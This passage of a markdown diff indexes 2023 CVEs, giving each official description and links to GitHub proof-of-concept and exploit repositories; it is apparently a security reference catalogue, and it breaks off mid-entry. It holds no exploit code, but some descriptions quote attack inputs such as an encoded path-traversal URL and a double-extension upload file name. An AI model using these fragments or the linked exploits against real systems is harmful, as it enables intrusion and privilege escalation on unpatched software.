+### CVE-2023-31703 (2023-05-17) + +Cross Site Scripting (XSS) in the edit user form in Microworld Technologies eScan management console 14.0.1400.2281 allows remote attacker to inject arbitrary code via the from parameter. + + +- [sahiloj/CVE-2023-31703](https://github.com/sahiloj/CVE-2023-31703) + +### CVE-2023-31704 (2023-07-13) + +Sourcecodester Online Computer and Laptop Store 1.0 is vulnerable to Incorrect Access Control, which allows remote attackers to elevate privileges to the administrator's role. + + +- [d34dun1c02n/CVE-2023-31704](https://github.com/d34dun1c02n/CVE-2023-31704) + +### CVE-2023-31705 (2023-07-13) + +A Reflected Cross-site scripting (XSS) vulnerability in Sourcecodester Task Reminder System 1.0 allows an authenticated user to inject malicious javascript into the page parameter. + + +- [d34dun1c02n/CVE-2023-31705](https://github.com/d34dun1c02n/CVE-2023-31705) + +### CVE-2023-31711 +- [HritikThapa7/CVE-2023-31711](https://github.com/HritikThapa7/CVE-2023-31711) + +### CVE-2023-31714 (2023-08-30) + +Chitor-CMS before v1.1.2 was discovered to contain multiple SQL injection vulnerabilities. + + +- [msd0pe-1/CVE-2023-31714](https://github.com/msd0pe-1/CVE-2023-31714) + +### CVE-2023-31716 (2023-09-21) + +FUXA <= 1.1.12 has a Local File Inclusion vulnerability via file=fuxa.log + + +- [MateusTesser/CVE-2023-31716](https://github.com/MateusTesser/CVE-2023-31716) + +### CVE-2023-31717 (2023-09-21) + +A SQL Injection attack in FUXA <= 1.1.12 allows exfiltration of confidential information from the database. + + +- [MateusTesser/CVE-2023-31717](https://github.com/MateusTesser/CVE-2023-31717) + +### CVE-2023-31718 (2023-09-21) + +FUXA <= 1.1.12 is vulnerable to Local via Inclusion via /api/download. + + +- [MateusTesser/CVE-2023-31718](https://github.com/MateusTesser/CVE-2023-31718) + +### CVE-2023-31719 (2023-09-21) + +FUXA <= 1.1.12 is vulnerable to SQL Injection via /api/signin. + + +- [MateusTesser/CVE-2023-31719](https://github.com/MateusTesser/CVE-2023-31719) + +### CVE-2023-31726 (2023-05-23) + +AList 3.15.1 is vulnerable to Incorrect Access Control, which can be exploited by attackers to obtain sensitive information. + + +- [J6451/CVE-2023-31726](https://github.com/J6451/CVE-2023-31726) + +### CVE-2023-31747 (2023-05-23) + +Wondershare Filmora 12 (Build 12.2.1.2088) was discovered to contain an unquoted service path vulnerability via the component NativePushService. This vulnerability allows attackers to launch processes with elevated privileges. + + +- [msd0pe-1/CVE-2023-31747](https://github.com/msd0pe-1/CVE-2023-31747) + +### CVE-2023-31753 (2023-07-20) + +SQL injection vulnerability in diskusi.php in eNdonesia 8.7, allows an attacker to execute arbitrary SQL commands via the "rid=" parameter. + + +- [khmk2k/CVE-2023-31753](https://github.com/khmk2k/CVE-2023-31753) + +### CVE-2023-31756 (2023-05-19) + +A command injection vulnerability exists in the administrative web portal in TP-Link Archer VR1600V devices running firmware Versions <= 0.1.0. 0.9.1 v5006.0 Build 220518 Rel.32480n which allows remote attackers, authenticated to the administrative web portal as an administrator user to open an operating system level shell via the 'X_TP_IfName' parameter. + + +- [StanleyJobsonAU/LongBow](https://github.com/StanleyJobsonAU/LongBow) + +### CVE-2023-31779 (2023-05-22) + +Wekan v6.84 and earlier is vulnerable to Cross Site Scripting (XSS). An attacker with user privilege on kanban board can insert JavaScript code in in "Reaction to comment" feature. + + +- [jet-pentest/CVE-2023-31779](https://github.com/jet-pentest/CVE-2023-31779) + +### CVE-2023-31851 (2023-07-17) + +Cudy LT400 1.13.4 is has a cross-site scripting (XSS) vulnerability in /cgi-bin/luci/admin/network/wireless/status via the iface parameter. + + +- [CalfCrusher/CVE-2023-31851](https://github.com/CalfCrusher/CVE-2023-31851) + +### CVE-2023-31852 (2023-07-17) + +Cudy LT400 1.13.4 is vulnerable to Cross Site Scripting (XSS) in cgi-bin/luci/admin/network/wireless/config via the iface parameter. + + +- [CalfCrusher/CVE-2023-31852](https://github.com/CalfCrusher/CVE-2023-31852) + +### CVE-2023-31853 (2023-07-17) + +Cudy LT400 1.13.4 is vulnerable Cross Site Scripting (XSS) in /cgi-bin/luci/admin/network/bandwidth via the icon parameter. + + +- [CalfCrusher/CVE-2023-31853](https://github.com/CalfCrusher/CVE-2023-31853) + +### CVE-2023-32031 (2023-06-14) + +Microsoft Exchange Server Remote Code Execution Vulnerability + + +- [Avento/CVE-2023-32031](https://github.com/Avento/CVE-2023-32031) + +### CVE-2023-32073 (2023-05-12) + +WWBN AVideo is an open source video platform. In versions 12.4 and prior, a command injection vulnerability exists at `plugin/CloneSite/cloneClient.json.php` which allows Remote Code Execution if you CloneSite Plugin. This is a bypass to the fix for CVE-2023-30854, which affects WWBN AVideo up to version 12.3. This issue is patched in commit 1df4af01f80d56ff2c4c43b89d0bac151e7fb6e3. + + +- [jmrcsnchz/CVE-2023-32073](https://github.com/jmrcsnchz/CVE-2023-32073) + +### CVE-2023-32117 (2024-12-09) + +Missing Authorization vulnerability in SoftLab Integrate Google Drive allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Integrate Google Drive: from n/a through 1.1.99. + + +- [RandomRobbieBF/CVE-2023-32117](https://github.com/RandomRobbieBF/CVE-2023-32117) + +### CVE-2023-32162 (2023-09-06) + +Wacom Drivers for Windows Incorrect Permission Assignment Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Wacom Drivers for Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThe specific flaw exists within the handling of the WacomInstallI.txt file by the PrefUtil.exe utility. The issue results from incorrect permissions on the WacomInstallI.txt file. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-16318. + + +- [LucaBarile/ZDI-CAN-16318](https://github.com/LucaBarile/ZDI-CAN-16318) + +### CVE-2023-32163 (2023-09-06) + +Wacom Drivers for Windows Link Following Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Wacom Drivers for Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThe specific flaw exists within the Tablet Service. By creating a symbolic link, an attacker can abuse the service to create a file. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-16857. + + +- [LucaBarile/ZDI-CAN-16857](https://github.com/LucaBarile/ZDI-CAN-16857) + +### CVE-2023-32233 (2023-05-08) + +In the Linux kernel through 6.3.1, a use-after-free in Netfilter nf_tables when processing batch requests can be abused to perform arbitrary read and write operations on kernel memory. Unprivileged local users can obtain root privileges. This occurs because anonymous sets are mishandled. + + +- [PIDAN-HEIDASHUAI/CVE-2023-32233](https://github.com/PIDAN-HEIDASHUAI/CVE-2023-32233) +- [Liuk3r/CVE-2023-32233](https://github.com/Liuk3r/CVE-2023-32233) +- [oferchen/POC-CVE-2023-32233](https://github.com/oferchen/POC-CVE-2023-32233) +- [RogelioPumajulca/TEST-CVE-2023-32233](https://github.com/RogelioPumajulca/TEST-CVE-2023-32233) +- [void0red/CVE-2023-32233](https://github.com/void0red/CVE-2023-32233) + +### CVE-2023-32235 (2023-05-05) + +Ghost before 5.42.1 allows remote attackers to read arbitrary files within the active theme's folder via /assets/built%2F..%2F..%2F/ directory traversal. This occurs in frontend/web/middleware/static-theme.js. + + +- [AXRoux/Ghost-Path-Traversal-CVE-2023-32235-](https://github.com/AXRoux/Ghost-Path-Traversal-CVE-2023-32235-) + +### CVE-2023-32243 (2023-05-12) + +Improper Authentication vulnerability in WPDeveloper Essential Addons for Elementor allows Privilege Escalation. This issue affects Essential Addons for Elementor: from 5.4.0 through 5.7.1. + + +- [little44n1o/cve-2023-32243](https://github.com/little44n1o/cve-2023-32243) +- [gbrsh/CVE-2023-32243](https://github.com/gbrsh/CVE-2023-32243) +- [RandomRobbieBF/CVE-2023-32243](https://github.com/RandomRobbieBF/CVE-2023-32243) +- [manavvedawala2/CVE-2023-32243-POC](https://github.com/manavvedawala2/CVE-2023-32243-POC) +- [manavvedawala2/CVE-2023-32243-proof-of-concept](https://github.com/manavvedawala2/CVE-2023-32243-proof-of-concept) +- [YouGina/CVE-2023-32243](https://github.com/YouGina/CVE-2023-32243) +- [thatonesecguy/Wordpress-Vulnerability-Identification-Scripts](https://github.com/thatonesecguy/Wordpress-Vulnerability-Identification-Scripts) +- [manavvedawala/CVE-2023-32243-proof-of-concept](https://github.com/manavvedawala/CVE-2023-32243-proof-of-concept) +- [Jenderal92/WP-CVE-2023-32243](https://github.com/Jenderal92/WP-CVE-2023-32243) +- [shaoyu521/Mass-CVE-2023-32243](https://github.com/shaoyu521/Mass-CVE-2023-32243) + +### CVE-2023-32314 (2023-05-15) + +vm2 is a sandbox that can run untrusted code with Node's built-in modules. A sandbox escape vulnerability exists in vm2 for versions up to and including 3.9.17. It abuses an unexpected creation of a host object based on the specification of `Proxy`. As a result a threat actor can bypass the sandbox protections to gain remote code execution rights on the host running the sandbox. This vulnerability was patched in the release of version `3.9.18` of `vm2`. Users are advised to upgrade. There are no known workarounds for this vulnerability. + + +- [AdarkSt/Honeypot_Smart_Infrastructure](https://github.com/AdarkSt/Honeypot_Smart_Infrastructure) + +### CVE-2023-32315 (2023-05-26) + +Openfire is an XMPP server licensed under the Open Source Apache License. Openfire's administrative console, a web-based application, was found to be vulnerable to a path traversal attack via the setup environment. This permitted an unauthenticated user to use the unauthenticated Openfire Setup Environment in an already configured Openfire environment to access restricted pages in the Openfire Admin Console reserved for administrative users. This vulnerability affects all versions of Openfire that have been released since April 2015, starting with version 3.10.0. The problem has been patched in Openfire release 4.7.5 and 4.6.8, and further improvements will be included in the yet-to-be released first version on the 4.8 branch (which is expected to be version 4.8.0). Users are advised to upgrade. If an Openfire upgrade isn’t available for a specific release, or isn’t quickly actionable, users may see the linked github advisory (GHSA-gw42-f939-fhvm) for mitigation advice. + + +- [ohnonoyesyes/CVE-2023-32315](https://github.com/ohnonoyesyes/CVE-2023-32315) +- [tangxiaofeng7/CVE-2023-32315-Openfire-Bypass](https://github.com/tangxiaofeng7/CVE-2023-32315-Openfire-Bypass) +- [5rGJ5aCh5oCq5YW9/CVE-2023-32315exp](https://github.com/5rGJ5aCh5oCq5YW9/CVE-2023-32315exp) +- [miko550/CVE-2023-32315](https://github.com/miko550/CVE-2023-32315) +- [ThatNotEasy/CVE-2023-32315](https://github.com/ThatNotEasy/CVE-2023-32315) +- [izzz0/CVE-2023-32315-POC](https://github.com/izzz0/CVE-2023-32315-POC) +- [gibran-abdillah/CVE-2023-32315](https://github.com/gibran-abdillah/CVE-2023-32315) +- [CN016/Openfire-RCE-CVE-2023-32315-](https://github.com/CN016/Openfire-RCE-CVE-2023-32315-) +- [K3ysTr0K3R/CVE-2023-32315-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2023-32315-EXPLOIT) +- [bryanqb07/CVE-2023-32315](https://github.com/bryanqb07/CVE-2023-32315) + +### CVE-2023-32353 (2023-06-23) + +A logic issue was addressed with improved checks. This issue is fixed in iTunes 12.12.9 for Windows. An app may be able to elevate privileges. + + +- [86x/CVE-2023-32353-PoC](https://github.com/86x/CVE-2023-32353-PoC) + +### CVE-2023-32364 (2023-07-27) + +A logic issue was addressed with improved restrictions. This issue is fixed in macOS Ventura 13.5. A sandboxed process may be able to circumvent sandbox restrictions. + + +- [gergelykalman/CVE-2023-32364-macos-app-sandbox-escape](https://github.com/gergelykalman/CVE-2023-32364-macos-app-sandbox-escape) + +### CVE-2023-32407 (2023-06-23) + +A logic issue was addressed with improved state management. This issue is fixed in watchOS 9.5, tvOS 16.5, macOS Ventura 13.4, iOS 15.7.6 and iPadOS 15.7.6, macOS Big Sur 11.7.7, macOS Monterey 12.6.6, iOS 16.5 and iPadOS 16.5. An app may be able to bypass Privacy preferences. + + +- [gergelykalman/CVE-2023-32407-a-macOS-TCC-bypass-in-Metal](https://github.com/gergelykalman/CVE-2023-32407-a-macOS-TCC-bypass-in-Metal) + +### CVE-2023-32413 (2023-06-23) + +A race condition was addressed with improved state handling. This issue is fixed in watchOS 9.5, tvOS 16.5, macOS Ventura 13.4, iOS 15.7.6 and iPadOS 15.7.6, macOS Big Sur 11.7.7, macOS Monterey 12.6.6, iOS 16.5 and iPadOS 16.5. An app may be able to gain root privileges. + + +- [synacktiv/CVE-2023-32413](https://github.com/synacktiv/CVE-2023-32413) + +### CVE-2023-32422 (2023-06-23) + +This issue was addressed by adding additional SQLite logging restrictions. This issue is fixed in iOS 16.5 and iPadOS 16.5, tvOS 16.5, macOS Ventura 13.4. An app may be able to bypass Privacy preferences. + + +- [gergelykalman/CVE-2023-32422-a-macOS-TCC-bypass-in-sqlite](https://github.com/gergelykalman/CVE-2023-32422-a-macOS-TCC-bypass-in-sqlite) + +### CVE-2023-32428 (2023-09-06) + +This issue was addressed with improved file handling. This issue is fixed in macOS Ventura 13.4, tvOS 16.5, iOS 16.5 and iPadOS 16.5, watchOS 9.5. An app may be able to gain root privileges. + + +- [gergelykalman/CVE-2023-32428-a-macOS-LPE-via-MallocStackLogging](https://github.com/gergelykalman/CVE-2023-32428-a-macOS-LPE-via-MallocStackLogging) + +### CVE-2023-32560 (2023-08-10) + +An attacker can send a specially crafted message to the Wavelink Avalanche Manager, which could result in service disruption or arbitrary code execution.\n\nThanks to a Researcher at Tenable for finding and reporting.\n\nFixed in version 6.4.1. + + +- [x0rb3l/CVE-2023-32560](https://github.com/x0rb3l/CVE-2023-32560) +- [idkwastaken/CVE-2023-32560](https://github.com/idkwastaken/CVE-2023-32560) + +### CVE-2023-32571 (2023-06-22) + +Dynamic Linq 1.0.7.10 through 1.2.25 before 1.3.0 allows attackers to execute arbitrary code and commands when untrusted input to methods including Where, Select, OrderBy is parsed. + + +- [Tris0n/CVE-2023-32571-POC](https://github.com/Tris0n/CVE-2023-32571-POC) +- [vert16x/CVE-2023-32571-POC](https://github.com/vert16x/CVE-2023-32571-POC) + +### CVE-2023-32629 (2023-07-26) + +Local privilege escalation vulnerability in Ubuntu Kernels overlayfs ovl_copy_up_meta_inode_data skip permission checks when calling ovl_do_setxattr on Ubuntu kernels + + +- [kaotickj/Check-for-CVE-2023-32629-GameOver-lay](https://github.com/kaotickj/Check-for-CVE-2023-32629-GameOver-lay) +- [ThrynSec/CVE-2023-32629-CVE-2023-2640---POC-Escalation](https://github.com/ThrynSec/CVE-2023-32629-CVE-2023-2640---POC-Escalation) +- [k4but0/Ubuntu-LPE](https://github.com/k4but0/Ubuntu-LPE) +- [xS9NTX/CVE-2023-32629-CVE-2023-2640-Ubuntu-Privilege-Escalation-POC](https://github.com/xS9NTX/CVE-2023-32629-CVE-2023-2640-Ubuntu-Privilege-Escalation-POC) + +### CVE-2023-32681 (2023-05-26) + +Requests is a HTTP library. Since Requests 2.3.0, Requests has been leaking Proxy-Authorization headers to destination servers when redirected to an HTTPS endpoint. This is a product of how we use `rebuild_proxies` to reattach the `Proxy-Authorization` header to requests. For HTTP connections sent through the tunnel, the proxy will identify the header in the request itself and remove it prior to forwarding to the destination server. However when sent over HTTPS, the `Proxy-Authorization` header must be sent in the CONNECT request as the proxy has no visibility into the tunneled request. This results in Requests forwarding proxy credentials to the destination server unintentionally, allowing a malicious actor to potentially exfiltrate sensitive information. This issue has been patched in version 2.31.0.\n\n + + +- [hardikmodha/POC-CVE-2023-32681](https://github.com/hardikmodha/POC-CVE-2023-32681) + +### CVE-2023-32707 (2023-06-01) + +In versions of Splunk Enterprise below 9.0.5, 8.2.11, and 8.1.14, and Splunk Cloud Platform below version 9.0.2303.100, a low-privileged user who holds a role that has the ‘edit_user’ capability assigned to it can escalate their privileges to that of the admin user by providing specially crafted web requests. + + +- [9xN/CVE-2023-32707](https://github.com/9xN/CVE-2023-32707) + +### CVE-2023-32749 (2023-06-08) + +Pydio Cells allows users by default to create so-called external users in order to share files with them. By modifying the HTTP request sent when creating such an external user, it is possible to assign the new user arbitrary roles. By assigning all roles to a newly created user, access to all cells and non-personal workspaces is granted. + + +- [xcr-19/CVE-2023-32749](https://github.com/xcr-19/CVE-2023-32749) + +### CVE-2023-32784 (2023-05-15) + +In KeePass 2.x before 2.54, it is possible to recover the cleartext master password from a memory dump, even when a workspace is locked or no longer running. The memory dump can be a KeePass process dump, swap file (pagefile.sys), hibernation file (hiberfil.sys), or RAM dump of the entire system. The first character cannot be recovered. In 2.54, there is different API usage and/or random string insertion for mitigation. + + +- [vdohney/keepass-password-dumper](https://github.com/vdohney/keepass-password-dumper) +- [CTM1/CVE-2023-32784-keepass-linux](https://github.com/CTM1/CVE-2023-32784-keepass-linux) +- [und3sc0n0c1d0/BruteForce-to-KeePass](https://github.com/und3sc0n0c1d0/BruteForce-to-KeePass) +- [z-jxy/keepass_dump](https://github.com/z-jxy/keepass_dump) +- [LeDocteurDesBits/cve-2023-32784](https://github.com/LeDocteurDesBits/cve-2023-32784) +- [hau-zy/KeePass-dump-py](https://github.com/hau-zy/KeePass-dump-py) +- [dawnl3ss/CVE-2023-32784](https://github.com/dawnl3ss/CVE-2023-32784) +- [le01s/poc-CVE-2023-32784](https://github.com/le01s/poc-CVE-2023-32784) +- [mister-turtle/cve-2023-32784](https://github.com/mister-turtle/cve-2023-32784) +- [Cmadhushanka/CVE-2023-32784-Exploitation](https://github.com/Cmadhushanka/CVE-2023-32784-Exploitation) +- [SarahZimmermann-Schmutzler/exploit_keepass](https://github.com/SarahZimmermann-Schmutzler/exploit_keepass) +- [dev0558/CVE-2023-32784-EXPLOIT-REPORT](https://github.com/dev0558/CVE-2023-32784-EXPLOIT-REPORT) + +### CVE-2023-32961 (2023-06-12) + +Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Katie Seaborn Zotpress plugin <= 7.3.3 versions. + + +- [LOURC0D3/CVE-2023-32961](https://github.com/LOURC0D3/CVE-2023-32961) + +### CVE-2023-33105 (2024-03-04) + +Transient DOS in WLAN Host and Firmware when large number of open authentication frames are sent with an invalid transaction sequence number. + + +- [D3adP3nguin/CVE-2023-33105-Transient-DOS-in-WLAN-Host-and-Firmware](https://github.com/D3adP3nguin/CVE-2023-33105-Transient-DOS-in-WLAN-Host-and-Firmware) + +### CVE-2023-33242 (2023-08-09) + +Crypto wallets implementing the Lindell17 TSS protocol might allow an attacker to extract the full ECDSA private key by exfiltrating a single bit in every signature attempt (256 in total) because of not adhering to the paper's security proof's assumption regarding handling aborts after a failed signature. + + +- [d0rb/CVE-2023-33242](https://github.com/d0rb/CVE-2023-33242) + +### CVE-2023-33243 (2023-06-15) + +RedTeam Pentesting discovered that the web interface of STARFACE as well as its REST API allows authentication using the SHA512 hash of the password instead of the cleartext password. While storing password hashes instead of cleartext passwords in an application's database generally has become best practice to protect users' passwords in case of a database compromise, this is rendered ineffective when allowing to authenticate using the password hash. + + +- [RedTeamPentesting/CVE-2023-33243](https://github.com/RedTeamPentesting/CVE-2023-33243) + +### CVE-2023-33246 (2023-05-24) + +For RocketMQ versions 5.1.0 and below, under certain conditions, there is a risk of remote command execution. \n\nSeveral components of RocketMQ, including NameServer, Broker, and Controller, are leaked on the extranet and lack permission verification, an attacker can exploit this vulnerability by using the update configuration function to execute commands as the system users that RocketMQ is running as. Additionally, an attacker can achieve the same effect by forging the RocketMQ protocol content. \n\nTo prevent these attacks, users are recommended to upgrade to version 5.1.1 or above for using RocketMQ 5.x or 4.9.6 or above for using RocketMQ 4.x .\n\n\n\n\n\n\n\n\n\n\n\n + + +- [I5N0rth/CVE-2023-33246](https://github.com/I5N0rth/CVE-2023-33246) +- [4mazing/CVE-2023-33246-Copy](https://github.com/4mazing/CVE-2023-33246-Copy) +- [Le1a/CVE-2023-33246](https://github.com/Le1a/CVE-2023-33246) +- [SuperZero/CVE-2023-33246](https://github.com/SuperZero/CVE-2023-33246) +- [Malayke/CVE-2023-33246_RocketMQ_RCE_EXPLOIT](https://github.com/Malayke/CVE-2023-33246_RocketMQ_RCE_EXPLOIT) +- [3yujw7njai/CVE-2023-33246](https://github.com/3yujw7njai/CVE-2023-33246) +- [Devil0ll/CVE-2023-33246](https://github.com/Devil0ll/CVE-2023-33246) +- [d0rb/CVE-2023-33246](https://github.com/d0rb/CVE-2023-33246) +- [vulncheck-oss/fetch-broker-conf](https://github.com/vulncheck-oss/fetch-broker-conf) +- [0xKayala/CVE-2023-33246](https://github.com/0xKayala/CVE-2023-33246) +- [MkJos/CVE-2023-33246_RocketMQ_RCE_EXP](https://github.com/MkJos/CVE-2023-33246_RocketMQ_RCE_EXP) +- [hanch7274/CVE-2023-33246](https://github.com/hanch7274/CVE-2023-33246) +- [Sumitpathania03/Apache-RocketMQ-CVE-2023-33246-](https://github.com/Sumitpathania03/Apache-RocketMQ-CVE-2023-33246-) +- [PavilionQ/CVE-2023-33246-mitigation](https://github.com/PavilionQ/CVE-2023-33246-mitigation) + +### CVE-2023-33253 (2023-06-12) + +LabCollector 6.0 though 6.15 allows remote code execution. An authenticated remote low-privileged user can upload an executable PHP file and execute system commands. The vulnerability is in the message function, and is due to insufficient validation of the file (such as shell.jpg.php.shell) being sent. + + +- [Toxich4/CVE-2023-33253](https://github.com/Toxich4/CVE-2023-33253) + +### CVE-2023-33264 (2023-05-22) + +In Hazelcast through 5.0.4, 5.1 through 5.1.6, and 5.2 through 5.2.3, configuration routines don't mask passwords in the member configuration properly. This allows Hazelcast Management Center users to view some of the secrets. + + +- [miguelc49/CVE-2023-33264-2](https://github.com/miguelc49/CVE-2023-33264-2) +- [miguelc49/CVE-2023-33264-1](https://github.com/miguelc49/CVE-2023-33264-1) +- [miguelc49/CVE-2023-33264-3](https://github.com/miguelc49/CVE-2023-33264-3) + +### CVE-2023-33381 (2023-06-06) + +A command injection vulnerability was found in the ping functionality of the MitraStar GPT-2741GNAC router (firmware version AR_g5.8_110WVN0b7_2). The vulnerability allows an authenticated user to execute arbitrary OS commands by sending specially crafted input to the router via the ping function. + + +- [duality084/CVE-2023-33381-MitraStar-GPT-2741GNAC](https://github.com/duality084/CVE-2023-33381-MitraStar-GPT-2741GNAC) + +### CVE-2023-33404 (2023-06-26) + +An Unrestricted Upload vulnerability, due to insufficient validation on UploadControlled.cs file, in BlogEngine.Net version 3.3.8.0 and earlier allows remote attackers to execute remote code. + + +- [hacip/CVE-2023-33404](https://github.com/hacip/CVE-2023-33404) + +### CVE-2023-33405 (2023-06-21) + +Blogengine.net 3.3.8.0 and earlier is vulnerable to Open Redirect. + + +- [hacip/CVE-2023-33405](https://github.com/hacip/CVE-2023-33405) + +### CVE-2023-33408 (2023-06-05) + +Minical 1.0.0 is vulnerable to Cross Site Scripting (XSS). The vulnerability exists due to insufficient input validation in the application's user input handling in the security_helper.php file. + + +- [Thirukrishnan/CVE-2023-33408](https://github.com/Thirukrishnan/CVE-2023-33408) + +### CVE-2023-33409 (2023-06-05) + +Minical 1.0.0 is vulnerable to Cross Site Request Forgery (CSRF) via minical/public/application/controllers/settings/company.php. + + +- [Thirukrishnan/CVE-2023-33409](https://github.com/Thirukrishnan/CVE-2023-33409) + +### CVE-2023-33410 (2023-06-05) + +Minical 1.0.0 and earlier contains a CSV injection vulnerability which allows an attacker to execute remote code. The vulnerability exists due to insufficient input validation on the Customer Name field in the Accounting module that is used to construct a CSV file. + + +- [Thirukrishnan/CVE-2023-33410](https://github.com/Thirukrishnan/CVE-2023-33410) + +### CVE-2023-33476 (2023-06-02) + +ReadyMedia (MiniDLNA) versions from 1.1.15 up to 1.3.2 is vulnerable to Buffer Overflow. The vulnerability is caused by incorrect validation logic when handling HTTP requests using chunked transport encoding. This results in other code later using attacker-controlled chunk values that exceed the length of the allocated buffer, resulting in out-of-bounds read/write. + + +- [mellow-hype/cve-2023-33476](https://github.com/mellow-hype/cve-2023-33476) + +### CVE-2023-33477 (2023-06-06) + +In Harmonic NSG 9000-6G devices, an authenticated remote user can obtain source code by directly requesting a special path. + + +- [Skr11lex/CVE-2023-33477](https://github.com/Skr11lex/CVE-2023-33477) + +### CVE-2023-33517 (2023-10-23) + +carRental 1.0 is vulnerable to Incorrect Access Control (Arbitrary File Read on the Back-end System). + + +- [wushigudan/CVE-2023-33517](https://github.com/wushigudan/CVE-2023-33517) + +### CVE-2023-33580 (2023-06-26) + +Phpgurukul Student Study Center Management System V1.0 is vulnerable to Cross Site Scripting (XSS) in the "Admin Name" field on Admin Profile page. + + +- [sudovivek/My-CVE](https://github.com/sudovivek/My-CVE) + +### CVE-2023-33592 (2023-06-28) + +Lost and Found Information System v1.0 was discovered to contain a SQL injection vulnerability via the component /php-lfis/admin/?page=system_info/contact_information. + + +- [ChineseOldboy/CVE-2023-33592](https://github.com/ChineseOldboy/CVE-2023-33592) + +### CVE-2023-33617 (2023-05-23) + +An OS Command Injection vulnerability in Parks Fiberlink 210 firmware version V2.1.14_X000 was found via the /boaform/admin/formPing target_addr parameter. + + +- [Chocapikk/CVE-2023-33617](https://github.com/Chocapikk/CVE-2023-33617) +- [tucommenceapousser/CVE-2023-33617](https://github.com/tucommenceapousser/CVE-2023-33617) + +### CVE-2023-33668 (2023-07-12) + +DigiExam up to v14.0.2 lacks integrity checks for native modules, allowing attackers to access PII and takeover accounts on shared computers. + + +- [lodi-g/CVE-2023-33668](https://github.com/lodi-g/CVE-2023-33668) + +### CVE-2023-33669 (2023-06-02) + +Tenda AC8V4.0-V16.03.34.06 was discovered to contain a stack overflow via the timeZone parameter in the sub_44db3c function. + + +- [retr0reg/tenda-ac8v4-rop](https://github.com/retr0reg/tenda-ac8v4-rop) +- [Mohammaddvd/CVE-2023-33669](https://github.com/Mohammaddvd/CVE-2023-33669) + +### CVE-2023-33730 (2023-05-31) + +Privilege Escalation in the "GetUserCurrentPwd" function in Microworld Technologies eScan Management Console 14.0.1400.2281 allows any remote attacker to retrieve password of any admin or normal user in plain text format. + + +- [sahiloj/CVE-2023-33730](https://github.com/sahiloj/CVE-2023-33730) + +### CVE-2023-33731 (2023-06-02) + +Reflected Cross Site Scripting (XSS) in the view dashboard detail feature in Microworld Technologies eScan management console 14.0.1400.2281 allows remote attacker to inject arbitrary code via the URL directly. + + +- [sahiloj/CVE-2023-33731](https://github.com/sahiloj/CVE-2023-33731) + +### CVE-2023-33732 (2023-05-31) + +Cross Site Scripting (XSS) in the New Policy form in Microworld Technologies eScan management console 14.0.1400.2281 allows a remote attacker to inject arbitrary code via the vulnerable parameters type, txtPolicyType, and Deletefileval. + + +- [sahiloj/CVE-2023-33732](https://github.com/sahiloj/CVE-2023-33732) + +### CVE-2023-33733 (2023-06-05) + +Reportlab up to v3.6.12 allows attackers to execute arbitrary code via supplying a crafted PDF file. + + +- [c53elyas/CVE-2023-33733](https://github.com/c53elyas/CVE-2023-33733) +- [hoangbui24/CVE-2023-33733](https://github.com/hoangbui24/CVE-2023-33733) +- [onion2203/Lab_Reportlab](https://github.com/onion2203/Lab_Reportlab) +- [buiduchoang24/CVE-2023-33733](https://github.com/buiduchoang24/CVE-2023-33733) +- [L41KAA/CVE-2023-33733-Exploit-PoC](https://github.com/L41KAA/CVE-2023-33733-Exploit-PoC) + +### CVE-2023-33747 (2023-06-06) + +CloudPanel v2.2.2 allows attackers to execute a path traversal. + + +- [0xWhoami35/CloudPanel-CVE-2023-33747](https://github.com/0xWhoami35/CloudPanel-CVE-2023-33747) + +### CVE-2023-33768 (2023-07-13) + +Incorrect signature verification of the firmware during the Device Firmware Update process of Belkin Wemo Smart Plug WSP080 v1.2 allows attackers to cause a Denial of Service (DoS) via a crafted firmware file. + + +- [purseclab/CVE-2023-33768](https://github.com/purseclab/CVE-2023-33768) +- [Fr0stM0urne/CVE-2023-33768](https://github.com/Fr0stM0urne/CVE-2023-33768) + +### CVE-2023-33781 (2023-06-07) + +An issue in D-Link DIR-842V2 v1.0.3 allows attackers to execute arbitrary commands via importing a crafted file. + + +- [s0tr/CVE-2023-33781](https://github.com/s0tr/CVE-2023-33781) + +### CVE-2023-33782 (2023-06-07) + +D-Link DIR-842V2 v1.0.3 was discovered to contain a command injection vulnerability via the iperf3 diagnostics function. + + +- [s0tr/CVE-2023-33782](https://github.com/s0tr/CVE-2023-33782) + +### CVE-2023-33802 (2023-07-26) + +A buffer overflow in SumatraPDF Reader v3.4.6 allows attackers to cause a Denial of Service (DoS) via a crafted text file. + + +- [CDACesec/CVE-2023-33802](https://github.com/CDACesec/CVE-2023-33802) + +### CVE-2023-33817 (2023-06-13) + +hoteldruid v3.0.5 was discovered to contain a SQL injection vulnerability. + + +- [leekenghwa/CVE-2023-33817---SQL-Injection-found-in-HotelDruid-3.0.5](https://github.com/leekenghwa/CVE-2023-33817---SQL-Injection-found-in-HotelDruid-3.0.5) + +### CVE-2023-33829 (2023-05-24) + +A stored cross-site scripting (XSS) vulnerability in Cloudogu GmbH SCM Manager v1.2 to v1.60 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Description text field. + + +- [n3gox/CVE-2023-33829](https://github.com/n3gox/CVE-2023-33829) +- [3yujw7njai/CVE-2023-33829-POC](https://github.com/3yujw7njai/CVE-2023-33829-POC) + +### CVE-2023-33831 (2023-09-18) + +A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request. + + +- [rodolfomarianocy/Unauthenticated-RCE-FUXA-CVE-2023-33831](https://github.com/rodolfomarianocy/Unauthenticated-RCE-FUXA-CVE-2023-33831) +- [btar1gan/exploit_CVE-2023-33831](https://github.com/btar1gan/exploit_CVE-2023-33831) + +### CVE-2023-33902 (2023-07-12) + +In bluetooth service, there is a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. + + +- [uthrasri/CVE-2023-33902_single_file](https://github.com/uthrasri/CVE-2023-33902_single_file) + +### CVE-2023-33977 (2023-06-06) + +Kiwi TCMS is an open source test management system for both manual and automated testing. Kiwi TCMS allows users to upload attachments to test plans, test cases, 